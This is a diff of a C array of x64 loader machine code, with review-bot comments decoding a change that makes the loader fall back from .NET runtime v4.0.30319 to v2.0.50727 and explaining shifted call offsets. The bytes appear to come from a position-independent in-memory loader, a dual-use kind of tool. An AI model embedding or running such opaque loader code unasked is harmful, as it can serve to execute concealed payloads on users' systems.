0x02, 0x00, 0x00, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xe8, 0x8a, 0x2b,
0x00, 0x00, 0x41, 0x8b, 0xf4, 0xeb, 0x02, 0x8b, 0xf3, 0x44, 0x8b, 0x85,
0xc0, 0x02, 0x00, 0x00, 0x33, 0xd2, 0x49, 0x8b, 0xcf, 0xe8, 0x32, 0x2b,
0xc0, 0x02, 0x00, 0x00, 0x33, 0xd2, 0x49, 0x8b, 0xcf, 0xe8, 0x92, 0x2b,
0x00, 0x00, 0x41, 0xff, 0x55, 0x00, 0x4d, 0x8b, 0xc7, 0x41, 0x8b, 0xd4,
0x48, 0x8b, 0xc8, 0xff, 0x97, 0xe0, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x6c,
0x24, 0x48, 0x49, 0x8b, 0xce, 0xff, 0x97, 0x70, 0x01, 0x00, 0x00, 0x49,
@ -197,8 +197,8 @@ unsigned char LOADER_EXE_X64[] = {
0x74, 0x48, 0x83, 0xbf, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x3f, 0x48,
0x8b, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x97, 0x48, 0x0d, 0x00,
0x00, 0x44, 0x8b, 0x8f, 0x58, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x8f, 0x38,
0x0d, 0x00, 0x00, 0x4c, 0x8b, 0xc3, 0xe8, 0xdd, 0x26, 0x00, 0x00, 0x48,
0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f, 0x2c, 0x0c, 0x00, 0x00, 0xe8, 0x8d,
0x0d, 0x00, 0x00, 0x4c, 0x8b, 0xc3, 0xe8, 0x3d, 0x27, 0x00, 0x00, 0x48,
0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f, 0x2c, 0x0c, 0x00, 0x00, 0xe8, 0xed,
0x25, 0x00, 0x00, 0x48, 0x3b, 0x83, 0x18, 0x05, 0x00, 0x00, 0x41, 0x0f,
0x45, 0xf6, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x48, 0x81, 0xc4, 0x78,
0x03, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f,
@ -215,10 +215,10 @@ unsigned char LOADER_EXE_X64[] = {
0x8a, 0x00, 0x84, 0xc0, 0x74, 0x14, 0x33, 0xd2, 0xff, 0xc1, 0x0c, 0x20,
0x88, 0x44, 0x15, 0xf0, 0x8b, 0xd1, 0x42, 0x8a, 0x04, 0x01, 0x84, 0xc0,
0x75, 0xee, 0xc6, 0x44, 0x0d, 0xf0, 0x00, 0x49, 0x8b, 0xd1, 0x48, 0x8d,
0x4d, 0xf0, 0xe8, 0xc9, 0x24, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
0x4d, 0xf0, 0xe8, 0x29, 0x25, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00, 0x8d, 0x4e, 0xff, 0x48, 0x8b,
0x95, 0x68, 0x01, 0x00, 0x00, 0x8b, 0xf1, 0x44, 0x8b, 0xf9, 0x8b, 0x0c,
0x88, 0x48, 0x03, 0xcb, 0xe8, 0xa3, 0x24, 0x00, 0x00, 0x48, 0x33, 0x44,
0x88, 0x48, 0x03, 0xcb, 0xe8, 0x03, 0x25, 0x00, 0x00, 0x48, 0x33, 0x44,
0x24, 0x20, 0x48, 0x3b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x74, 0x1a, 0x85,
0xf6, 0x75, 0xcd, 0x33, 0xc0, 0x48, 0x81, 0xc4, 0x08, 0x02, 0x00, 0x00,
0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0x5d,
@ -246,10 +246,10 @@ unsigned char LOADER_EXE_X64[] = {
0xf9, 0x4c, 0x8b, 0x50, 0x60, 0x49, 0x8b, 0x42, 0x18, 0x48, 0x8b, 0x58,
0x10, 0x4c, 0x39, 0x5b, 0x30, 0x74, 0x2e, 0x4d, 0x85, 0xdb, 0x75, 0x4a,
0x48, 0x8b, 0x53, 0x30, 0x48, 0x3b, 0xd5, 0x74, 0x11, 0x45, 0x33, 0xc9,
0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xcf, 0xe8, 0x35, 0x21, 0x00, 0x00, 0x4c,
0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xcf, 0xe8, 0x95, 0x21, 0x00, 0x00, 0x4c,
0x8b, 0xd8, 0x48, 0x8b, 0x1b, 0x48, 0x83, 0x7b, 0x30, 0x00, 0x75, 0xd7,
0x4d, 0x85, 0xdb, 0x75, 0x21, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xe8,
0x30, 0x20, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x0e, 0x48, 0x8b, 0xd6,
0x90, 0x20, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x0e, 0x48, 0x8b, 0xd6,
0x48, 0x8b, 0xc8, 0xff, 0x57, 0x38, 0x4c, 0x8b, 0xd8, 0xeb, 0x03, 0x45,
0x33, 0xdb, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x49, 0x8b, 0xc3, 0x48, 0x8b,
0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x8b, 0x7c, 0x24,
@ -359,7 +359,7 @@ unsigned char LOADER_EXE_X64[] = {
0x04, 0x0a, 0x41, 0xff, 0xc1, 0x48, 0xff, 0xc1, 0x49, 0xff, 0xc0, 0x8a,
0x01, 0x84, 0xc0, 0x75, 0xe1, 0x4d, 0x85, 0xc0, 0x74, 0x27, 0x49, 0x63,
0xc9, 0x48, 0x8b, 0xd7, 0x48, 0xff, 0xc1, 0x42, 0xc6, 0x44, 0x04, 0x20,
0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0x4a, 0x23,
0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0xaa, 0x23,
0x00, 0x00, 0x85, 0xc0, 0x75, 0xa5, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
0x02, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x48,
0x81, 0xc4, 0xa0, 0x00, 0x00, 0x00, 0x5f, 0xc3, 0x40, 0x53, 0x48, 0x83,
@ -373,31 +373,39 @@ unsigned char LOADER_EXE_X64[] = {
0x10, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57, 0x41, 0x54, 0x41, 0x56,
0x41, 0x57, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x89,
0xa0, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xe4, 0x49, 0x8b, 0xf0,
0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf9, 0x41, 0xbf, 0x00, 0x01, 0x00, 0x00,
0x4d, 0x85, 0xc9, 0x0f, 0x84, 0x9a, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x91,
0x60, 0x08, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x50, 0x08, 0x00, 0x00, 0x41,
0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0xba, 0x00, 0x00, 0x00, 0x48, 0x8d,
0x44, 0x24, 0x30, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0x0c,
0x48, 0x89, 0x44, 0x24, 0x20, 0x41, 0x83, 0xc9, 0xff, 0x33, 0xd2, 0x33,
0xc9, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e, 0x48, 0x8d, 0x5e, 0x08, 0x4c,
0x8d, 0x87, 0x70, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xcb, 0x48, 0x8d, 0x54,
0x24, 0x30, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c,
0x48, 0x8b, 0x0b, 0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x78, 0x37, 0x44, 0x39, 0xa4,
0x24, 0x60, 0x02, 0x00, 0x00, 0x74, 0x20, 0x48, 0x8b, 0x0b, 0x4c, 0x8d,
0x4e, 0x10, 0x4c, 0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x97,
0x80, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x03,
0x4c, 0x21, 0x23, 0x85, 0xc0, 0x78, 0x09, 0x4c, 0x39, 0xa7, 0xa0, 0x01,
0x00, 0x00, 0x75, 0x21, 0x48, 0x8d, 0x46, 0x10, 0x33, 0xd2, 0x4c, 0x8d,
0x8f, 0x90, 0x08, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d,
0x87, 0x80, 0x08, 0x00, 0x00, 0x33, 0xc9, 0xff, 0x97, 0x98, 0x01, 0x00,
0x00, 0x85, 0xc0, 0x79, 0x10, 0x4c, 0x21, 0x66, 0x10, 0x33, 0xc0, 0xe9,
0x45, 0x01, 0x00, 0x00, 0x4c, 0x21, 0x26, 0xeb, 0xcb, 0x48, 0x8b, 0x4e,
0x10, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x2b,
0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x4c, 0x8d,
0x76, 0x18, 0x45, 0x38, 0x20, 0x75, 0x12, 0x48, 0x8b, 0x4e, 0x10, 0x49,
0x8b, 0xd6, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x68, 0x44, 0x8b, 0xf8, 0xeb,
0x48, 0x48, 0x8d, 0x44, 0x24, 0x30, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x41,
0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf9, 0x4d, 0x85, 0xc9, 0x0f, 0x84, 0xfd,
0x00, 0x00, 0x00, 0x48, 0x8d, 0x91, 0x60, 0x08, 0x00, 0x00, 0x48, 0x81,
0xc1, 0x50, 0x08, 0x00, 0x00, 0x41, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88,
0x1d, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24,
0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x44,
0x24, 0x20, 0x4c, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x0d, 0x34, 0x33, 0xd2,
0xc6, 0x45, 0x11, 0x33, 0x33, 0xc9, 0x66, 0xc7, 0x45, 0x13, 0x33, 0x31,
0xc6, 0x45, 0x15, 0x39, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e, 0x48, 0x8d,
0x5e, 0x08, 0x4c, 0x8d, 0xbf, 0x70, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xcb,
0x4d, 0x8b, 0xc7, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x01, 0xff,
0x50, 0x18, 0x85, 0xc0, 0x79, 0x4b, 0x48, 0x8d, 0x44, 0x24, 0x30, 0xc7,
0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48,
0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x0d, 0x32,
0x33, 0xd2, 0xc6, 0x45, 0x11, 0x35, 0x33, 0xc9, 0x66, 0xc7, 0x45, 0x13,
0x37, 0x32, 0xc6, 0x45, 0x15, 0x37, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e,
0x48, 0x8d, 0x54, 0x24, 0x30, 0x4c, 0x8b, 0xcb, 0x4d, 0x8b, 0xc7, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c, 0x48, 0x8b, 0x0b,
0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
0x50, 0x50, 0x85, 0xc0, 0x78, 0x37, 0x44, 0x39, 0xa4, 0x24, 0x60, 0x02,
0x00, 0x00, 0x74, 0x20, 0x48, 0x8b, 0x0b, 0x4c, 0x8d, 0x4e, 0x10, 0x4c,
0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x97, 0x80, 0x08, 0x00,
0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x03, 0x4c, 0x21, 0x23,
0x85, 0xc0, 0x78, 0x09, 0x4c, 0x39, 0xa7, 0xa0, 0x01, 0x00, 0x00, 0x75,
0x21, 0x48, 0x8d, 0x46, 0x10, 0x33, 0xd2, 0x4c, 0x8d, 0x8f, 0x90, 0x08,
0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x87, 0x80, 0x08,
0x00, 0x00, 0x33, 0xc9, 0xff, 0x97, 0x98, 0x01, 0x00, 0x00, 0x85, 0xc0,
0x79, 0x10, 0x4c, 0x21, 0x66, 0x10, 0x33, 0xc0, 0xe9, 0x48, 0x01, 0x00,
0x00, 0x4c, 0x21, 0x26, 0xeb, 0xcb, 0x48, 0x8b, 0x4e, 0x10, 0x48, 0x8b,
0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x2e, 0x01, 0x00, 0x00,
0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x76, 0x18, 0x45,
0x38, 0x20, 0x75, 0x12, 0x48, 0x8b, 0x4e, 0x10, 0x49, 0x8b, 0xd6, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x68, 0x44, 0x8b, 0xf8, 0xeb, 0x4b, 0x48, 0x8d,
0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41,
0x83, 0xc9, 0xff, 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9,
0xff, 0x57, 0x70, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0xff, 0x97, 0x30, 0x01,
0x00, 0x00, 0x48, 0x8b, 0x4e, 0x10, 0x4d, 0x8b, 0xce, 0x45, 0x33, 0xc0,
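Review bot: The bytes inserted between the first `0x4d, 0x85, 0xc9, 0x0f, 0x84` and the second `0xff, 0x57, 0x70` in this hunk change which runtime version string the loader hands to the call through `[rdi+0x70]`, and nothing in the hunk documents that. Decoded, `0xc6, 0x45, 0x0d, 0x34`, `0xc6, 0x45, 0x11, 0x33`, `0x66, 0xc7, 0x45, 0x13, 0x33, 0x31` and `0xc6, 0x45, 0x15, 0x39` store the ASCII digits '4', '3', '3', '1', '9' into the buffer at [rbp+0xc] whose address is then loaded with `0x4c, 0x8d, 0x45, 0x0c` (lea r8, [rbp+0xc]); when the following vtable call `0xff, 0x50, 0x18` returns negative (`0x85, 0xc0, 0x79, 0x4b` skips ahead only on a non-negative result), a second copy stores '2', '5', '7', '2', '7' into the same offsets and repeats the call. If the untouched positions in that buffer hold the 'v', '.', '0' characters of the original string, this builds "v4.0.30319" and then "v2.0.50727", so the loader now overwrites the instance-supplied version in place and silently falls back to the v2 runtime. Please commit the loader source change that produced these bytes, with a comment stating the fallback order, and regenerate the array from the build instead of committing the bytes alone; the swap of `mov r15d, 0x100` (`0x41, 0xbf, 0x00, 0x01, 0x00, 0x00`, dropped) for `mov dword [rsp+0x28], 0x100` (`0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00`) is only reviewable against that source.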
@ -459,15 +467,15 @@ unsigned char LOADER_EXE_X64[] = {
0x48, 0x85, 0xc0, 0x75, 0x0d, 0x48, 0x39, 0x87, 0xa0, 0x01, 0x00, 0x00,
0x0f, 0x85, 0xb9, 0x01, 0x00, 0x00, 0xff, 0xc6, 0x3b, 0xb7, 0x3c, 0x02,
0x00, 0x00, 0x72, 0xcd, 0x8b, 0x87, 0x20, 0x09, 0x00, 0x00, 0x83, 0xf8,
0x02, 0x75, 0x1f, 0x48, 0x8b, 0xcf, 0xe8, 0x5d, 0xef, 0xff, 0xff, 0x41,
0x02, 0x75, 0x1f, 0x48, 0x8b, 0xcf, 0xe8, 0xfd, 0xee, 0xff, 0xff, 0x41,
0xbe, 0x01, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x94, 0x01, 0x00,
0x00, 0x48, 0x8b, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0xeb, 0x23, 0x41, 0xbe,
0x01, 0x00, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0x7c, 0x01, 0x00,
0x00, 0x48, 0x8d, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0x41, 0x3b, 0xc6, 0x74,
0x08, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x01, 0x00, 0x00, 0x44, 0x39, 0xb7,
0x70, 0x05, 0x00, 0x00, 0x74, 0x32, 0x48, 0x8b, 0xcf, 0xe8, 0x56, 0xed,
0x70, 0x05, 0x00, 0x00, 0x74, 0x32, 0x48, 0x8b, 0xcf, 0xe8, 0xf6, 0xec,
0xff, 0xff, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbf, 0x70, 0x05, 0x00, 0x00,
0x02, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xe8, 0x69,
0x02, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xe8, 0x09,
0xee, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbf, 0x70, 0x05, 0x00,
0x00, 0x02, 0x0f, 0x84, 0x2d, 0x01, 0x00, 0x00, 0x44, 0x39, 0x73, 0x08,
0x0f, 0x84, 0xad, 0x00, 0x00, 0x00, 0x8b, 0x93, 0x24, 0x05, 0x00, 0x00,
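Review bot: The three changed lines here are rel32 call displacements each reduced by 0x60 (`0xe8, 0x5d, 0xef` to `0xe8, 0xfd, 0xee`, `0xe8, 0x56, 0xed` to `0xe8, 0xf6, 0xec`, `0xe8, 0x69, 0xee` to `0xe8, 0x09, 0xee`), which matches the eight extra 12-byte lines (96 bytes) added in the hunk above; the same -0x60 shift accounts for every changed byte in the remaining LOADER_EXE_X64 hunks on this page, including the `0x48, 0x8d, 0x05` RIP-relative lea table. There is nothing to review in these hunks beyond confirming they came out of the toolchain rather than a hand edit, which is one more reason to commit the loader source next to the regenerated array.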
@ -489,9 +497,9 @@ unsigned char LOADER_EXE_X64[] = {
0x41, 0x3b, 0xc6, 0x76, 0x15, 0x8d, 0x41, 0xfb, 0x41, 0x3b, 0xc6, 0x77,
0x4b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8, 0xa8, 0x0f, 0x00, 0x00,
0xeb, 0x3e, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0x48, 0x8b, 0xd3, 0x48, 0x8b,
0xcf, 0xe8, 0x62, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10, 0x4c, 0x8d,
0xcf, 0xe8, 0x02, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10, 0x4c, 0x8d,
0x44, 0x24, 0x30, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8, 0x9e, 0x00,
0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0xcf, 0xe8, 0xd1,
0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0xcf, 0xe8, 0x71,
0xf4, 0xff, 0xff, 0xeb, 0x0b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8,
0xb4, 0x04, 0x00, 0x00, 0x83, 0xbf, 0x30, 0x02, 0x00, 0x00, 0x03, 0x75,
0x08, 0xeb, 0xfe, 0x41, 0xbe, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x87, 0x20,
@ -687,7 +695,7 @@ unsigned char LOADER_EXE_X64[] = {
0x10, 0x49, 0x03, 0xf8, 0x4d, 0x03, 0xf8, 0x48, 0x8b, 0x0f, 0x33, 0xc0,
0x48, 0x85, 0xc9, 0x74, 0x55, 0x79, 0x08, 0x44, 0x8b, 0xc9, 0x45, 0x33,
0xc0, 0xeb, 0x2c, 0x4e, 0x8d, 0x24, 0x01, 0x41, 0x39, 0x46, 0x04, 0x74,
0x1a, 0x49, 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0x32, 0xf0,
0x1a, 0x49, 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0xd2, 0xef,
0xff, 0xff, 0x85, 0xc0, 0x74, 0x09, 0x48, 0x8b, 0x86, 0xe0, 0x01, 0x00,
0x00, 0xeb, 0x13, 0x45, 0x33, 0xc9, 0x4d, 0x8d, 0x44, 0x24, 0x02, 0x49,
0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xe8, 0x66, 0x0c, 0x00, 0x00, 0x49, 0x89,
@ -833,24 +841,24 @@ unsigned char LOADER_EXE_X64[] = {
0x4c, 0x24, 0x28, 0x44, 0x8b, 0xcb, 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24,
0x20, 0x33, 0xd2, 0xff, 0x56, 0x70, 0x83, 0x65, 0xe8, 0x00, 0x48, 0x8d,
0x45, 0x80, 0x83, 0x65, 0xf8, 0x00, 0x48, 0x8d, 0x55, 0x08, 0x48, 0x89,
0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x74, 0xdb, 0xff, 0xff,
0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0xf9,
0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0x56, 0xda,
0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0xd3, 0xda, 0xff,
0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0x50, 0xda, 0xff, 0xff,
0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0x41, 0xda, 0xff, 0xff, 0x48,
0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0x36, 0xda, 0xff, 0xff, 0x48, 0x89,
0x45, 0xb0, 0x48, 0x8d, 0x05, 0x2b, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45,
0xb8, 0x48, 0x8d, 0x05, 0xb8, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
0x48, 0x8d, 0x05, 0x15, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
0x8d, 0x05, 0x0a, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0x92, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x76, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0xd2, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x66, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0x5a, 0xd9,
0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x14, 0xdb, 0xff, 0xff,
0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0x99,
0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0xf6, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0x73, 0xda, 0xff,
0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0xf0, 0xd9, 0xff, 0xff,
0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0xe1, 0xd9, 0xff, 0xff, 0x48,
0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0xd6, 0xd9, 0xff, 0xff, 0x48, 0x89,
0x45, 0xb0, 0x48, 0x8d, 0x05, 0xcb, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45,
0xb8, 0x48, 0x8d, 0x05, 0x58, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
0x48, 0x8d, 0x05, 0xb5, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
0x8d, 0x05, 0xaa, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0x32, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x16, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0x72, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x06, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0xfa, 0xd8,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x70, 0x48, 0x8d, 0x45, 0x40, 0x48,
0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x90, 0xe5, 0xff, 0xff,
0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x30, 0xe5, 0xff, 0xff,
0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0xa8, 0x01, 0x00, 0x00, 0x85, 0xc0,
0x0f, 0x85, 0x4c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x03, 0x00,
0x00, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0xd0, 0x08, 0x00, 0x00, 0x48, 0x89,
@ -924,12 +932,12 @@ unsigned char LOADER_EXE_X64[] = {
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x82, 0x45, 0x85, 0xff, 0x74,
0x38, 0x85, 0xed, 0x74, 0x14, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9,
0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x65, 0xff, 0xff,
0xff, 0x48, 0x8b, 0x13, 0x48, 0x8b, 0xce, 0xe8, 0xa4, 0xe5, 0xff, 0xff,
0xff, 0x48, 0x8b, 0x13, 0x48, 0x8b, 0xce, 0xe8, 0x44, 0xe5, 0xff, 0xff,
0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0xff,
0xff, 0xff, 0x48, 0x8b, 0x44, 0x24, 0x28, 0xeb, 0x35, 0x85, 0xed, 0x74,
0x14, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00,
0x48, 0x85, 0xc0, 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x13,
0x48, 0x8b, 0xce, 0xe8, 0x6c, 0xe5, 0xff, 0xff, 0x41, 0xb9, 0x01, 0x00,
0x48, 0x8b, 0xce, 0xe8, 0x0c, 0xe5, 0xff, 0xff, 0x41, 0xb9, 0x01, 0x00,
0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x14, 0xff, 0xff, 0xff, 0x49, 0x8b,
0x46, 0x08, 0x48, 0x89, 0x03, 0xe9, 0x08, 0xff, 0xff, 0xff, 0x48, 0x8b,
0x3f, 0x48, 0x83, 0x7f, 0x30, 0x00, 0x0f, 0x85, 0xf3, 0xfe, 0xff, 0xff,
@ -985,7 +993,7 @@ unsigned char LOADER_EXE_X64[] = {
0x73, 0x12, 0x8b, 0xca, 0xff, 0xc2, 0x42, 0x8a, 0x04, 0x01, 0x88, 0x44,
0x0c, 0x60, 0x46, 0x38, 0x1c, 0x02, 0x75, 0xe9, 0x8b, 0xc2, 0x4c, 0x8d,
0x4c, 0x24, 0x60, 0x4c, 0x8d, 0x44, 0x24, 0x20, 0x48, 0x8b, 0xd7, 0x49,
0x8b, 0xca, 0x44, 0x88, 0x5c, 0x04, 0x60, 0xe8, 0xfc, 0xdc, 0xff, 0xff,
0x8b, 0xca, 0x44, 0x88, 0x5c, 0x04, 0x60, 0xe8, 0x9c, 0xdc, 0xff, 0xff,
0x48, 0x8b, 0xd8, 0x48, 0x8b, 0xc3, 0xeb, 0x12, 0x44, 0x2b, 0x4e, 0x10,
0x43, 0x8b, 0x1c, 0x8e, 0x48, 0x03, 0xdf, 0xe9, 0x40, 0xff, 0xff, 0xff,
0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x81,
